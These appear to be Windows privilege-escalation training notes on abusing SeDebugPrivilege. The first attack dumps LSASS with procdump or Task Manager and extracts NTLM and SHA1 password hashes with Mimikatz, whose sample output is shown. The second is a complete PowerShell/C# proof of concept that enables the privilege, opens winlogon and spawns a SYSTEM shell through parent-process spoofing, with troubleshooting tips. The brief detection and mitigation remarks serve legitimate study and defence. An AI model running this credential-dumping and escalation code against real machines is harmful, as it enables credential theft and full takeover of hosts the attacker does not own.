SeDebug
SeDebugPrivilege allows a user to debug processes they don't own. This right may be assigned to developers who need to debug new system components as part of their day-to-day job. In practice it lets the holder open any process (including SYSTEM-owned ones such as LSASS or Winlogon) with full access regardless of the process's DACL, which is what both attacks below rely on.
Attack 1: Dump memory from a running process
Very often we target LSASS. First we dump the process memory using procdump.exe from the Sysinternals suite:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

We can also dump it from an RDP session: take a manual memory dump of the LSASS process via the Task Manager by browsing to the Details tab, right-clicking the lsass.exe process, and selecting Create dump file (the dump is written to the user's %TEMP% folder). Note that if LSASS runs as a protected process (RunAsPPL) the handle open fails even with SeDebugPrivilege, and with Credential Guard enabled the secrets are not in LSASS memory in the first place. Dumping LSASS is also one of the most heavily monitored actions on a host, so expect EDR alerts.
Then we can extract the hashes from the memory dump using Mimikatz:
C:\hacker> mimikatz.exe
mimikatz # log
Using 'mimikatz.log' for logfile : OK
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 23196355 (00000000:0161f2c3)
Session : Interactive from 4
User Name : DWM-4
Domain : Window Manager
Logon Server : (null)
Logon Time : 3/31/2021 3:00:57 PM
SID : S-1-5-90-0-4
msv :
tspkg :
wdigest :
* Username : WINLPE-SRV01$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
<SNIP>
Authentication Id : 0 ; 23026942 (00000000:015f5cfe)
Session : RemoteInteractive from 2
User Name : jordan
Domain : WINLPE-SRV01
Logon Server : WINLPE-SRV01
Logon Time : 3/31/2021 2:59:52 PM
SID : S-1-5-21-3769161915-3336846931-3985975925-1000
msv :
[00000003] Primary
* Username : jordan
* Domain : WINLPE-SRV01
* NTLM : cf3a5525ee9414229e66279623ed5c58
* SHA1 : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
tspkg :
wdigest :
* Username : jordan
* Domain : WINLPE-SRV01
* Password : (null)
kerberos :
* Username : jordan
* Domain : WINLPE-SRV01
* Password : (null)
ssp :
credman :
<SNIP>

Attack 2: RCE
We can use this PoC script to spawn a child process from a parent process owned by SYSTEM (such as Winlogon or LSASS). The child inherits the primary token of its parent, so it runs as SYSTEM. This works because SeDebugPrivilege lets us open the SYSTEM process with PROCESS_CREATE_PROCESS access even though its DACL would otherwise deny us; the parent is then set through the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute when calling CreateProcess.
We must indicate the PID of the SYSTEM-owned parent process and the command we want to execute in the child process we will create:
For example, to get an elevated shell:
A shortcut is to use the process name instead of the PID with the Get-Process cmdlet:
There are also automated scripts to directly get an elevated shell:
https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeDebugPrivilegePoC
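As an added example (this is not the PoC script referred to above nor PrivFu's code), the following PowerShell reproduces the technique end to end: it enables SeDebugPrivilege in the current token (the privilege is assigned but disabled by default, which is why mimikatz needs privilege::debug), opens the SYSTEM parent with PROCESS_CREATE_PROCESS, and creates the child with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS so it inherits the SYSTEM token. The class name SeDebugSpawn, its method names and the choice of winlogon as the parent are this example's own assumptions; the Win32 APIs and constants are the documented ones.

```powershell
# Added example: spawn a SYSTEM child under a SYSTEM-owned parent using SeDebugPrivilege.
# Class/method names (SeDebugSpawn, EnableDebugPrivilege, CreateProcessFromParent) are assumptions.
$Source = @"
using System;
using System.Runtime.InteropServices;

public class SeDebugSpawn
{
    [StructLayout(LayoutKind.Sequential)] struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
    [StructLayout(LayoutKind.Sequential)] struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; }
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct STARTUPINFO
    {
        public int cb; public string lpReserved; public string lpDesktop; public string lpTitle;
        public int dwX; public int dwY; public int dwXSize; public int dwYSize; public int dwXCountChars;
        public int dwYCountChars; public int dwFillAttribute; public int dwFlags; public short wShowWindow;
        public short cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError;
    }
    [StructLayout(LayoutKind.Sequential)] struct STARTUPINFOEX { public STARTUPINFO StartupInfo; public IntPtr lpAttributeList; }

    const uint SE_PRIVILEGE_ENABLED = 0x2;
    const uint TOKEN_ADJUST_PRIVILEGES = 0x20, TOKEN_QUERY = 0x8;
    const uint PROCESS_CREATE_PROCESS = 0x80;                 // all we need on the parent
    const int  PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;
    const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000, CREATE_NEW_CONSOLE = 0x10;

    [DllImport("advapi32.dll", SetLastError = true)] static extern bool OpenProcessToken(IntPtr h, uint access, out IntPtr tok);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool AdjustTokenPrivileges(IntPtr tok, bool disableAll, ref TOKEN_PRIVILEGES newState, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll", SetLastError = true)] static extern bool InitializeProcThreadAttributeList(IntPtr list, int count, int flags, ref IntPtr size);
    [DllImport("kernel32.dll", SetLastError = true)] static extern bool UpdateProcThreadAttribute(IntPtr list, uint flags, IntPtr attr, IntPtr value, IntPtr size, IntPtr prev, IntPtr retSize);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)] static extern bool CreateProcess(string app, string cmd, IntPtr pa, IntPtr ta, bool inherit, uint flags, IntPtr env, string dir, ref STARTUPINFOEX si, out PROCESS_INFORMATION pi);
    [DllImport("kernel32.dll", SetLastError = true)] static extern bool CloseHandle(IntPtr h);

    // Step 1: SeDebugPrivilege is present in the token but disabled; enable it (what privilege::debug does).
    public static void EnableDebugPrivilege()
    {
        IntPtr hToken;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))
            throw new System.ComponentModel.Win32Exception();
        TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
        tp.PrivilegeCount = 1; tp.Attributes = SE_PRIVILEGE_ENABLED;
        if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out tp.Luid))
            throw new System.ComponentModel.Win32Exception();
        AdjustTokenPrivileges(hToken, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
        int err = Marshal.GetLastWin32Error();   // 1300 (ERROR_NOT_ALL_ASSIGNED) means we do not hold SeDebug at all
        CloseHandle(hToken);
        if (err != 0) throw new System.ComponentModel.Win32Exception(err);
    }

    // Step 2: open the SYSTEM parent (DACL bypassed thanks to SeDebug) and spawn the child under it.
    public static int CreateProcessFromParent(int parentPid, string commandLine)
    {
        IntPtr hParent = OpenProcess(PROCESS_CREATE_PROCESS, false, parentPid);
        if (hParent == IntPtr.Zero) throw new System.ComponentModel.Win32Exception();

        IntPtr size = IntPtr.Zero;
        InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref size);   // first call only reports the needed size
        IntPtr attrList = Marshal.AllocHGlobal(size);
        if (!InitializeProcThreadAttributeList(attrList, 1, 0, ref size))
            throw new System.ComponentModel.Win32Exception();

        IntPtr hParentPtr = Marshal.AllocHGlobal(IntPtr.Size);
        Marshal.WriteIntPtr(hParentPtr, hParent);
        if (!UpdateProcThreadAttribute(attrList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                                       hParentPtr, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero))
            throw new System.ComponentModel.Win32Exception();

        STARTUPINFOEX si = new STARTUPINFOEX();
        si.StartupInfo.cb = Marshal.SizeOf(si);
        si.lpAttributeList = attrList;
        PROCESS_INFORMATION pi;
        if (!CreateProcess(null, commandLine, IntPtr.Zero, IntPtr.Zero, false,
                           EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref si, out pi))
            throw new System.ComponentModel.Win32Exception();

        CloseHandle(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(hParent);
        Marshal.FreeHGlobal(hParentPtr); Marshal.FreeHGlobal(attrList);
        return pi.dwProcessId;   // the child runs with the parent's (SYSTEM) primary token
    }
}
"@
Add-Type -TypeDefinition $Source

[SeDebugSpawn]::EnableDebugPrivilege()
$parentPid = (Get-Process -Name winlogon)[0].Id          # any SYSTEM-owned process works; winlogon is an assumption
$childPid  = [SeDebugSpawn]::CreateProcessFromParent($parentPid, "cmd.exe")
"Spawned PID $childPid as a child of winlogon ($parentPid); run whoami in the new window to confirm NT AUTHORITY\SYSTEM"
```

If EnableDebugPrivilege throws with error 1300 the account simply does not hold SeDebugPrivilege (check with whoami /priv). If OpenProcess fails with access denied despite the privilege being enabled, the chosen parent is probably a protected process (PPL), so pick another SYSTEM process such as winlogon. Defenders can spot this technique because the new cmd.exe has a parent PID that does not match the process that actually created it (Sysmon Event ID 1 records the spoofed parent, while ETW-based EDR telemetry records the real creator).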